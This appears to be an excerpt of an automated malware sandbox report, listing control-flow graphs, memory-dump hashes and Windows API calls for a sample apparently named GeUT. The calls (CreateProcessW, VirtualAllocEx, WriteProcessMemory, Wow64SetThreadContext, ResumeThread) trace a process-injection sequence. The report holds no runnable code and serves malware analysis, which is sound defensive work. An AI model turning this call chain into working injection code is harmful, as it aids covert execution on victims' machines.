                      • Instruction Fuzzy Hash: 3C81B075D00269DFDF21CFA9C940BEDBBB5BB49304F1091AAE508B7260DB709A89CF54

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 570 1871b9c-1871c33 572 1871c35-1871c47 570->572 573 1871c4a-1871c58 570->573 572->573 574 1871c6f-1871cab 573->574 575 1871c5a-1871c6c 573->575 576 1871cbf-1871d8c CreateProcessW 574->576 577 1871cad-1871cbc 574->577 575->574 581 1871d95-1871e54 576->581 582 1871d8e-1871d94 576->582 577->576 592 1871e56-1871e7f 581->592 593 1871e8a-1871e95 581->593 582->581 592->593 597 1871e96 593->597 597->597
                      APIs
                      • CreateProcessW.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 01871D79
                      Memory Dump Source
                      • Source File: 00000004.00000002.2254675820.0000000001870000.00000040.00000800.00020000.00000000.sdmp, Offset: 01870000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_4_2_1870000_GeUT.jbxd
                      Similarity
                      • API ID: CreateProcess
                      • String ID:
                      • API String ID: 963392458-0
                      • Opcode ID: 3e9ccf95e6503a9d06ce54b114f68e038bf53d490642f0a9786f28d7598534e5
                      • Instruction ID: 53325c0b305c251d9137066cd1d7f6ae43c151cf39c8b4ce361560908e7bb6eb
                      • Opcode Fuzzy Hash: 3e9ccf95e6503a9d06ce54b114f68e038bf53d490642f0a9786f28d7598534e5
                      • Instruction Fuzzy Hash: 5281B375D00229DFDF21CFA9C984BDDBBB5BB49304F1091AAE508B7250DB709A85CF54

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 598 1876ea4-1876f3b 599 1876f52-1876f60 598->599 600 1876f3d-1876f4f 598->600 601 1876f77-1876fb3 599->601 602 1876f62-1876f74 599->602 600->599 603 1876fc7-1877094 CreateProcessW 601->603 604 1876fb5-1876fc4 601->604 602->601 608 1877096-187709c 603->608 609 187709d-187715c 603->609 604->603 608->609 619 1877192-187719d 609->619 620 187715e-1877187 609->620 624 187719e 619->624 620->619 624->624
                      APIs
                      • CreateProcessW.KERNELBASE(?,?,?,?,?,?,?,?,?,00000000), ref: 01877081
                      Memory Dump Source
                      • Source File: 00000004.00000002.2254675820.0000000001870000.00000040.00000800.00020000.00000000.sdmp, Offset: 01870000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_4_2_1870000_GeUT.jbxd
                      Similarity
                      • API ID: CreateProcess
                      • String ID:
                      • API String ID: 963392458-0
                      • Opcode ID: 546b0fe4ab222e6be74ecb5ee1625df6eeb63f44b994cc34b63cb7bc742ec581
                      • Instruction ID: 96887f4b6a579caf3a52458bb4046d0c450cf3167824f00e7432c129b8a21cf7
                      • Opcode Fuzzy Hash: 546b0fe4ab222e6be74ecb5ee1625df6eeb63f44b994cc34b63cb7bc742ec581
                      • Instruction Fuzzy Hash: DB81C2B5C00269DFDF21CFA9D984BEDBBB5BB09300F1095AAE508B7250DB709A85CF54

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 653 187614c-1877d73 655 1877d75-1877d87 653->655 656 1877d8a-1877d98 653->656 655->656 657 1877daf-1877deb 656->657 658 1877d9a-1877dac 656->658 659 1877dff-1877ecc CreateProcessW 657->659 660 1877ded-1877dfc 657->660 658->657 664 1877ed5-1877f94 659->664 665 1877ece-1877ed4 659->665 660->659 675 1877f96-1877fbf 664->675 676 1877fca-1877fd5 664->676 665->664 675->676 680 1877fd6 676->680 680->680
                      APIs
                      • CreateProcessW.KERNELBASE(?,?,?,?,?,?,?,?,?,00000000), ref: 01877EB9
                      Memory Dump Source
                      • Source File: 00000004.00000002.2254675820.0000000001870000.00000040.00000800.00020000.00000000.sdmp, Offset: 01870000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_4_2_1870000_GeUT.jbxd
                      Similarity
                      • API ID: CreateProcess
                      • String ID:
                      • API String ID: 963392458-0
                      • Opcode ID: 0950ca0a6fc4d23799e4572e48f5f11162297997a5db8f133ff37f0e9f86844b
                      • Instruction ID: 25c873452dc0e3c768bc21c523fa7cf20bfc688b670381f459543380dfe6cfe9
                      • Opcode Fuzzy Hash: 0950ca0a6fc4d23799e4572e48f5f11162297997a5db8f133ff37f0e9f86844b
                      • Instruction Fuzzy Hash: EA81CF75C0026DDFDB21DFA9C984BEDBBB5AB49300F1091AAE508B7220DB709A85CF54

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 625 1874024-1876f3b 627 1876f52-1876f60 625->627 628 1876f3d-1876f4f 625->628 629 1876f77-1876fb3 627->629 630 1876f62-1876f74 627->630 628->627 631 1876fc7-1877094 CreateProcessW 629->631 632 1876fb5-1876fc4 629->632 630->629 636 1877096-187709c 631->636 637 187709d-187715c 631->637 632->631 636->637 647 1877192-187719d 637->647 648 187715e-1877187 637->648 652 187719e 647->652 648->647 652->652
                      APIs
                      • CreateProcessW.KERNELBASE(?,?,?,?,?,?,?,?,?,00000000), ref: 01877081
                      Memory Dump Source
                      • Source File: 00000004.00000002.2254675820.0000000001870000.00000040.00000800.00020000.00000000.sdmp, Offset: 01870000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_4_2_1870000_GeUT.jbxd
                      Similarity
                      • API ID: CreateProcess
                      • String ID:
                      • API String ID: 963392458-0
                      • Opcode ID: 3379693a136a10ee2fc4caac2c1fac8e6b25410cde6e95b9f050297ddb45f698
                      • Instruction ID: abdb6778f1a349d973ab2c41e97c33eee07815f1e315c54653d51ba428ddd7ba
                      • Opcode Fuzzy Hash: 3379693a136a10ee2fc4caac2c1fac8e6b25410cde6e95b9f050297ddb45f698
                      • Instruction Fuzzy Hash: 4B81C174C00269DFDB21CFA9D984BEDBBB5AB49300F1091AAE508B7250DB709A85CF54

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 681 1877cdc-1877d73 683 1877d75-1877d87 681->683 684 1877d8a-1877d98 681->684 683->684 685 1877daf-1877deb 684->685 686 1877d9a-1877dac 684->686 687 1877dff-1877ecc CreateProcessW 685->687 688 1877ded-1877dfc 685->688 686->685 692 1877ed5-1877f94 687->692 693 1877ece-1877ed4 687->693 688->687 703 1877f96-1877fbf 692->703 704 1877fca-1877fd5 692->704 693->692 703->704 708 1877fd6 704->708 708->708
                      APIs
                      • CreateProcessW.KERNELBASE(?,?,?,?,?,?,?,?,?,00000000), ref: 01877EB9
                      Memory Dump Source
                      • Source File: 00000004.00000002.2254675820.0000000001870000.00000040.00000800.00020000.00000000.sdmp, Offset: 01870000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_4_2_1870000_GeUT.jbxd
                      Similarity
                      • API ID: CreateProcess
                      • String ID:
                      • API String ID: 963392458-0
                      • Opcode ID: a418eec7c7a6d7f0c780b3335699545f3b3882759d5b1a4faadb43967809b895
                      • Instruction ID: f4fba51065549c1298ecb7489825bc2d27ee3ec3eda4ce4767bb6f822cfd876f
                      • Opcode Fuzzy Hash: a418eec7c7a6d7f0c780b3335699545f3b3882759d5b1a4faadb43967809b895
                      • Instruction Fuzzy Hash: 3481C175C0022DDFDB21CFA9C984BEDBBB5AB49300F1091AAE508B7260DB709A85CF54

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 709 1871ba8-1871c33 710 1871c35-1871c47 709->710 711 1871c4a-1871c58 709->711 710->711 712 1871c6f-1871cab 711->712 713 1871c5a-1871c6c 711->713 714 1871cbf-1871d8c CreateProcessW 712->714 715 1871cad-1871cbc 712->715 713->712 719 1871d95-1871e54 714->719 720 1871d8e-1871d94 714->720 715->714 730 1871e56-1871e7f 719->730 731 1871e8a-1871e95 719->731 720->719 730->731 735 1871e96 731->735 735->735
                      APIs
                      • CreateProcessW.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 01871D79
                      Memory Dump Source
                      • Source File: 00000004.00000002.2254675820.0000000001870000.00000040.00000800.00020000.00000000.sdmp, Offset: 01870000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_4_2_1870000_GeUT.jbxd
                      Similarity
                      • API ID: CreateProcess
                      • String ID:
                      • API String ID: 963392458-0
                      • Opcode ID: 85c0ffc17f8e127d4009e6c1993895c9827298ad5004b6d28ea99832da7efceb
                      • Instruction ID: 0f677f0c4db3bc199a7c291a5664cade663d6a1297d74348bd649716b8cf2235
                      • Opcode Fuzzy Hash: 85c0ffc17f8e127d4009e6c1993895c9827298ad5004b6d28ea99832da7efceb
                      • Instruction Fuzzy Hash: 6281B175C00229DFDF21CFA9C984BDDBBB5BB49300F1491AAE508B7250DB709A89CF54

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 763 1875c78-1875d03 764 1875d05-1875d17 763->764 765 1875d1a-1875d28 763->765 764->765 766 1875d3f-1875d7b 765->766 767 1875d2a-1875d3c 765->767 768 1875d8f-1875e5c CreateProcessW 766->768 769 1875d7d-1875d8c 766->769 767->766 773 1875e65-1875f24 768->773 774 1875e5e-1875e64 768->774 769->768 784 1875f26-1875f4f 773->784 785 1875f5a-1875f65 773->785 774->773 784->785 788 1875f66 785->788 788->788
                      APIs
                      • CreateProcessW.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 01875E49
                      Memory Dump Source
                      • Source File: 00000004.00000002.2254675820.0000000001870000.00000040.00000800.00020000.00000000.sdmp, Offset: 01870000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_4_2_1870000_GeUT.jbxd
                      Similarity
                      • API ID: CreateProcess
                      • String ID:
                      • API String ID: 963392458-0
                      • Opcode ID: dea11526666f8d32b22339d58205b5193f1e4a606d074ea3f7a51397d117f9fd
                      • Instruction ID: 562cd715053042dd90c3d3c7be1597d864d0ad496d88eda3c2e2abed31061718
                      • Opcode Fuzzy Hash: dea11526666f8d32b22339d58205b5193f1e4a606d074ea3f7a51397d117f9fd
                      • Instruction Fuzzy Hash: 1981BF75C00229DFDF21CFA9C980BEDBBB5BB49300F1091AAE509B7260DB709A85CF54

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 736 1874e40-1874ecb 737 1874ee2-1874ef0 736->737 738 1874ecd-1874edf 736->738 739 1874f07-1874f43 737->739 740 1874ef2-1874f04 737->740 738->737 741 1874f57-1875024 CreateProcessW 739->741 742 1874f45-1874f54 739->742 740->739 746 1875026-187502c 741->746 747 187502d-18750ec 741->747 742->741 746->747 757 1875122-187512d 747->757 758 18750ee-1875117 747->758 762 187512e 757->762 758->757 762->762
                      APIs
                      • CreateProcessW.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 01875011
                      Memory Dump Source
                      • Source File: 00000004.00000002.2254675820.0000000001870000.00000040.00000800.00020000.00000000.sdmp, Offset: 01870000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_4_2_1870000_GeUT.jbxd
                      Similarity
                      • API ID: CreateProcess
                      • String ID:
                      • API String ID: 963392458-0
                      • Opcode ID: cf748e71808b269692c7dc2a113633ddd9ecce75fb0a233fa5b7388e306db57b
                      • Instruction ID: 2760085df4095d9af53f7cad78e1b202e6aeab21b9e6af1b68fffeaad36a253f
                      • Opcode Fuzzy Hash: cf748e71808b269692c7dc2a113633ddd9ecce75fb0a233fa5b7388e306db57b
                      • Instruction Fuzzy Hash: 2481BF75C00269DFDF21CFA9C940BEDBBB5BB49300F1091AAE508B7260DB709A89CF54

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 790 18721f0-187225f 791 1872276-18722d6 WriteProcessMemory 790->791 792 1872261-1872273 790->792 793 18722df-187231d 791->793 794 18722d8-18722de 791->794 792->791 794->793
                      APIs
                      • WriteProcessMemory.KERNELBASE(?,?,?,?,?), ref: 018722C6
                      Memory Dump Source
                      • Source File: 00000004.00000002.2254675820.0000000001870000.00000040.00000800.00020000.00000000.sdmp, Offset: 01870000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_4_2_1870000_GeUT.jbxd
                      Similarity
                      • API ID: MemoryProcessWrite
                      • String ID:
                      • API String ID: 3559483778-0
                      • Opcode ID: 00206ebd66e1c894dcf235037ae64583248b60f1ab28d6644e2406a6e6e1f197
                      • Instruction ID: cf27147f83900aa6b184e89d0a2c498b4e42635e7567519c00d0ec8d6f498e85
                      • Opcode Fuzzy Hash: 00206ebd66e1c894dcf235037ae64583248b60f1ab28d6644e2406a6e6e1f197
                      • Instruction Fuzzy Hash: C04188B5D002589FCB10CFA9D984ADEFBF1BB49314F24902AE918B7210D374AA45CF64
                      APIs
                      • WriteProcessMemory.KERNELBASE(?,?,?,?,?), ref: 018722C6
                      Memory Dump Source
                      • Source File: 00000004.00000002.2254675820.0000000001870000.00000040.00000800.00020000.00000000.sdmp, Offset: 01870000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_4_2_1870000_GeUT.jbxd
                      Similarity
                      • API ID: MemoryProcessWrite
                      • String ID:
                      • API String ID: 3559483778-0
                      • Opcode ID: ead596b87662bc4ba3043fcc3ddd4e85a4b8738e66fd31ac1719e54c1575d1a8
                      • Instruction ID: 7e57f2832f59091380fbb75f1bba2ff0efaac8e0d7529cb9ee407e806bee1b62
                      • Opcode Fuzzy Hash: ead596b87662bc4ba3043fcc3ddd4e85a4b8738e66fd31ac1719e54c1575d1a8
                      • Instruction Fuzzy Hash: 7B4166B9D042589FCB10CFA9D984ADEFBF1BB49314F24902AE918B7210D375AA45CB64
                      APIs
                      • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 01872085
                      Memory Dump Source
                      • Source File: 00000004.00000002.2254675820.0000000001870000.00000040.00000800.00020000.00000000.sdmp, Offset: 01870000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_4_2_1870000_GeUT.jbxd
                      Similarity
                      • API ID: MemoryProcessRead
                      • String ID:
                      • API String ID: 1726664587-0
                      • Opcode ID: 639fb87d58d4c1ccbe7b5c1c9d38b4e9233cf621260054586271dbf9d6b7a422
                      • Instruction ID: 60ac8d9c0fdcfda39d8e4c382e889823634aaf1a23bdc79391fd5cbbc93e6d4f
                      • Opcode Fuzzy Hash: 639fb87d58d4c1ccbe7b5c1c9d38b4e9233cf621260054586271dbf9d6b7a422
                      • Instruction Fuzzy Hash: 104178B9D04258DFCF10CFA9D984ADEFBB1BB19310F10A06AE914B7210D375AA45CF64
                      APIs
                      • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 01872195
                      Memory Dump Source
                      • Source File: 00000004.00000002.2254675820.0000000001870000.00000040.00000800.00020000.00000000.sdmp, Offset: 01870000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_4_2_1870000_GeUT.jbxd
                      Similarity
                      • API ID: AllocVirtual
                      • String ID:
                      • API String ID: 4275171209-0
                      • Opcode ID: 6d88f5f29754bdf270243aad0fb7baa4f999e9cf7ff2dbb0551e9c2a4cc203d3
                      • Instruction ID: e62e93ae0db1c319f36ea0548bb9e309db5fd95ec26b5d5766436b96d9d55753
                      • Opcode Fuzzy Hash: 6d88f5f29754bdf270243aad0fb7baa4f999e9cf7ff2dbb0551e9c2a4cc203d3
                      • Instruction Fuzzy Hash: 9B3176B9D00258DFCF10CFA9E980ADEBBB1BB49310F10A02AE914B7210D335A946CF64
                      APIs
                      • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 01872085
                      Memory Dump Source
                      • Source File: 00000004.00000002.2254675820.0000000001870000.00000040.00000800.00020000.00000000.sdmp, Offset: 01870000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_4_2_1870000_GeUT.jbxd
                      Similarity
                      • API ID: MemoryProcessRead
                      • String ID:
                      • API String ID: 1726664587-0
                      • Opcode ID: b09e24f280e03302563238593f79f3d40e6f807e8cb9618c85f3e3f8577bfca0
                      • Instruction ID: 93333e4b0807c51c3034bedeb357d341dc608944091f68576a5d75151c79b27a
                      • Opcode Fuzzy Hash: b09e24f280e03302563238593f79f3d40e6f807e8cb9618c85f3e3f8577bfca0
                      • Instruction Fuzzy Hash: 3E3187B9D04258DFCF10CFAAD984ADEFBB1BB19310F10A02AE914B7210D375AA45CF64
                      APIs
                      • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 01872195
                      Memory Dump Source
                      • Source File: 00000004.00000002.2254675820.0000000001870000.00000040.00000800.00020000.00000000.sdmp, Offset: 01870000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_4_2_1870000_GeUT.jbxd
                      Similarity
                      • API ID: AllocVirtual
                      • String ID:
                      • API String ID: 4275171209-0
                      • Opcode ID: feb0779841cb956d11a92346ad82aae27b071935d9a78de552d8253d03261b9a
                      • Instruction ID: 92237bfa6b65d62feda6b2ad0f85e6038a5d7dc288c78a48b9021568125007c7
                      • Opcode Fuzzy Hash: feb0779841cb956d11a92346ad82aae27b071935d9a78de552d8253d03261b9a
                      • Instruction Fuzzy Hash: 223154B9D04258DFCF10CFA9E984A9EFBB5BB19310F10A02AE914B7310D375A945CF65
                      APIs
                      • Wow64SetThreadContext.KERNEL32(?,?), ref: 01871F72
                      Memory Dump Source
                      • Source File: 00000004.00000002.2254675820.0000000001870000.00000040.00000800.00020000.00000000.sdmp, Offset: 01870000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_4_2_1870000_GeUT.jbxd
                      Similarity
                      • API ID: ContextThreadWow64
                      • String ID:
                      • API String ID: 983334009-0
                      • Opcode ID: aa3babea0792855a1791e601983560e9f2b0e2653978c9c6cf2f9cbd529c705b
                      • Instruction ID: be1e82eb49ea8b72e62048a6b56f0c6ab84b79e5c870181a0ba4aabc2cdce454
                      • Opcode Fuzzy Hash: aa3babea0792855a1791e601983560e9f2b0e2653978c9c6cf2f9cbd529c705b
                      • Instruction Fuzzy Hash: 5131A8B5D012589FCB10CFAAD984ADEFBF1BB49314F24906AE418B7250D378AA45CF64
                      APIs
                      • Wow64SetThreadContext.KERNEL32(?,?), ref: 01871F72
                      Memory Dump Source
                      • Source File: 00000004.00000002.2254675820.0000000001870000.00000040.00000800.00020000.00000000.sdmp, Offset: 01870000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_4_2_1870000_GeUT.jbxd
                      Similarity
                      • API ID: ContextThreadWow64
                      • String ID:
                      • API String ID: 983334009-0
                      • Opcode ID: 19151bf7c41047f290af5c4bfc037020ab4a06d5ce388a6746f25ffb57c006ac
                      • Instruction ID: ffaa6a1d48aa06c2f138031227b31c33575d46eabdd78951698d06fb037167e1
                      • Opcode Fuzzy Hash: 19151bf7c41047f290af5c4bfc037020ab4a06d5ce388a6746f25ffb57c006ac
                      • Instruction Fuzzy Hash: E23198B5D012589FCB10CFAAD984ADEFBF1BB49314F24902AE418B7310D378AA45CF64
                      APIs
                      • ResumeThread.KERNELBASE(?), ref: 018723AE
                      Memory Dump Source
                      • Source File: 00000004.00000002.2254675820.0000000001870000.00000040.00000800.00020000.00000000.sdmp, Offset: 01870000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_4_2_1870000_GeUT.jbxd
                      Similarity
                      • API ID: ResumeThread
                      • String ID:
                      • API String ID: 947044025-0
                      • Opcode ID: 8fcc4e6fa382b3e02967cf77c3ffd1a7705a4b5678ade58b026b523df3be7c3f
                      • Instruction ID: 0150de8fff7bf791081369f62b32c0692759e42a210d5ccf6509bbf3700d4265
                      • Opcode Fuzzy Hash: 8fcc4e6fa382b3e02967cf77c3ffd1a7705a4b5678ade58b026b523df3be7c3f
                      • Instruction Fuzzy Hash: C82199B9D002199FCB10CFA9D484ADEFBF4BB49324F24905AE914B7350D375A945CFA4
                      APIs
                      • ResumeThread.KERNELBASE(?), ref: 018723AE
                      Memory Dump Source
                      • Source File: 00000004.00000002.2254675820.0000000001870000.00000040.00000800.00020000.00000000.sdmp, Offset: 01870000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_4_2_1870000_GeUT.jbxd
                      Similarity
                      • API ID: ResumeThread
                      • String ID:
                      • API String ID: 947044025-0
                      • Opcode ID: db0c747cb13ef6125508b1b13c23358880add41a8a8956e4c3e48f11c82692f5
                      • Instruction ID: c424b106e88aff07fc1d11b2d3f0bb2ccbfe2ed7967bca825d09d7f5abb240fc
                      • Opcode Fuzzy Hash: db0c747cb13ef6125508b1b13c23358880add41a8a8956e4c3e48f11c82692f5
                      • Instruction Fuzzy Hash: 3321A6B8D002089FCB10CFA9D484ADEFBF4BB09324F20905AE918B7310D375A945CFA4
                      Memory Dump Source
                      • Source File: 00000004.00000002.2254528394.000000000181D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0181D000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_4_2_181d000_GeUT.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: a433631db42865f87b669028eb20c1915479eacc5b8bf441738672bf4fa4b9d2
                      • Instruction ID: 6fc14754805260fa2a1baf825140ba8ec5c100df108db54d47b23dea6706b6b3
                      • Opcode Fuzzy Hash: a433631db42865f87b669028eb20c1915479eacc5b8bf441738672bf4fa4b9d2
                      • Instruction Fuzzy Hash: 772128B3504204DFDB05DF54D9C8F26BF69FB84318F208A6DE90A8B25AC336D556CAE1
                      Memory Dump Source
                      • Source File: 00000004.00000002.2254528394.000000000181D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0181D000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_4_2_181d000_GeUT.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: fed46cca7f742b7caa711e8ed735342f41d2c2d3303e466d284e334843d61363
                      • Instruction ID: 4a7fd32292a3ccaa9d6eef062782301ad0043b80f7774c3984297b0e6cc81805
                      • Opcode Fuzzy Hash: fed46cca7f742b7caa711e8ed735342f41d2c2d3303e466d284e334843d61363
                      • Instruction Fuzzy Hash: 1B11B1B6504284CFCB16CF54D9C4B16BF71FB84314F24C6A9D8094B25BC33AD556CBA1
                      Memory Dump Source
                      • Source File: 00000005.00000002.2283119662.0000000002E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E10000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_5_2_2e10000_GeUT.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 2f26ca4c7b5644407e4e8c419ed7782e08cc9ee09740a6b137c46fd5734ea3bc
                      • Instruction ID: ff72253d5d09d42b4e09c3d75a57ec6af961a82468e618a90f249874c87fc80a
                      • Opcode Fuzzy Hash: 2f26ca4c7b5644407e4e8c419ed7782e08cc9ee09740a6b137c46fd5734ea3bc
                      • Instruction Fuzzy Hash: 145140386012418FDB19FB79EC5856E7FB7FB88211704AA3DD50687269EF789C16CB80
                      Memory Dump Source
                      • Source File: 00000005.00000002.2283119662.0000000002E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E10000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_5_2_2e10000_GeUT.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 5d417f6827dd28982f0dabe16032834f18b60ef62fe1f8c7eaed0afeb97b70bf
                      • Instruction ID: 16d1956f62762106c0a22b15c1e8e7d2f4cea63753f7fe455ba0d6be7c3d9f91
                      • Opcode Fuzzy Hash: 5d417f6827dd28982f0dabe16032834f18b60ef62fe1f8c7eaed0afeb97b70bf
                      • Instruction Fuzzy Hash: 15917D347002018FCB19EB79EC58A6E7BB3BB88211B14992DE506DB3A9DF749C15CB90
                      Memory Dump Source
                      • Source File: 00000005.00000002.2283119662.0000000002E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E10000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_5_2_2e10000_GeUT.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 8321f30600ae4559fa2740b705106229b8c73e26fa8c693d7fe4d96509069a27
                      • Instruction ID: 6cf4037383d7985615642f79f6c5a2b76a8162abfff7cf23fa13f405311bcc60
                      • Opcode Fuzzy Hash: 8321f30600ae4559fa2740b705106229b8c73e26fa8c693d7fe4d96509069a27
                      • Instruction Fuzzy Hash: B2318D31B006418BDB29AB79C81812E7AE3BFC52203149D3ED55B8B784DF74DC04CB91
                      Memory Dump Source
                      • Source File: 00000005.00000002.2283119662.0000000002E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E10000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_5_2_2e10000_GeUT.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: ad184fae1fb77744be6d55503786559f85bc915624915a3d19053527df113768
                      • Instruction ID: d139cf48dd180a925a94b6c329752aeed803f706eff95c8fe460bd2768b1e5fe
                      • Opcode Fuzzy Hash: ad184fae1fb77744be6d55503786559f85bc915624915a3d19053527df113768
                      • Instruction Fuzzy Hash: 41219371B012059FDB44EBF9881836FBAEBEFC8311B14842ED54AD7385DE348C0187A5
                      Memory Dump Source
                      • Source File: 00000005.00000002.2283119662.0000000002E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E10000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_5_2_2e10000_GeUT.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 1d1bd652dfefc7872024986f719707e9c263d43773670ad1066d3734bfd36ea9
                      • Instruction ID: 1d6712fe96728c9448fcbff1904efce283520ac66c2ca0728086699d5439af6b
                      • Opcode Fuzzy Hash: 1d1bd652dfefc7872024986f719707e9c263d43773670ad1066d3734bfd36ea9
                      • Instruction Fuzzy Hash: 40216D78E0021ADFDB45EBB9D8406AE7FB2FF88300F108669E505A7345EB706A51CF50
                      Memory Dump Source
                      • Source File: 00000005.00000002.2283119662.0000000002E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E10000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_5_2_2e10000_GeUT.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: d63f8db65cb9803910c70f3173dafeff156756e989ff52ba8bc20ce805681d10
                      • Instruction ID: de05cfa83a9afed34491d746d39e925ac9855b3c91e3d1fd3d156933958b0153
                      • Opcode Fuzzy Hash: d63f8db65cb9803910c70f3173dafeff156756e989ff52ba8bc20ce805681d10
                      • Instruction Fuzzy Hash: F9218E30E012098FCB48EBB8D9553AE7BF1AF85310F148479D40AAB289DB705E41CB81
                      Memory Dump Source
                      • Source File: 00000005.00000002.2283119662.0000000002E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E10000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_5_2_2e10000_GeUT.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 98fef72a98a06b814cbb9c7231e167f321470fe611d225172eaf596fdd26ea5c
                      • Instruction ID: 63c9923b3218494c55563dbf17084afa29c3ce4889d6b4d8fb33c25b7675ba53
                      • Opcode Fuzzy Hash: 98fef72a98a06b814cbb9c7231e167f321470fe611d225172eaf596fdd26ea5c
                      • Instruction Fuzzy Hash: 4921D138501267CFDB06FB29F980A453BB5FB89304B105B59A2049B519EBB86957CF80
                      Memory Dump Source
                      • Source File: 00000005.00000002.2283119662.0000000002E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E10000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_5_2_2e10000_GeUT.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 2a4e832a991e1ed925c0690c46b2cbc2d8a2f20634cc53f1b65b39c6de648a28
                      • Instruction ID: b828e2a64f4f21e2ca46c43f5b7b04161134c56e88b116c54a01b7fedf10099e
                      • Opcode Fuzzy Hash: 2a4e832a991e1ed925c0690c46b2cbc2d8a2f20634cc53f1b65b39c6de648a28
                      • Instruction Fuzzy Hash: 72119A3C501127CFDF06FB2AF8809453BB5FB88304710AB58A2049B61DEBB8795B8B80
                      Memory Dump Source
                      • Source File: 00000006.00000002.2285429549.00000000011B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 011B0000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_6_2_11b0000_GeUT.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 7c282e29bf76ae356c341191e0746cc5cc77f575b5a0131286c18c163974ea04
                      • Instruction ID: f985a0098bb18e5ee048fd392f2d7c6d92f0b3ddf8b30d9ab398cc5076bdf114
                      • Opcode Fuzzy Hash: 7c282e29bf76ae356c341191e0746cc5cc77f575b5a0131286c18c163974ea04
                      • Instruction Fuzzy Hash: 7D516374600645CFDB1AEF79E8585AD7FB6FB843013005A6CE046E7269EF749D09CB81
                      Memory Dump Source
                      • Source File: 00000006.00000002.2285429549.00000000011B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 011B0000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_6_2_11b0000_GeUT.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 8cd5d29e5431c0359e3cb9cb570c9242fbd63c2889bbf9a892a997c478053cf7
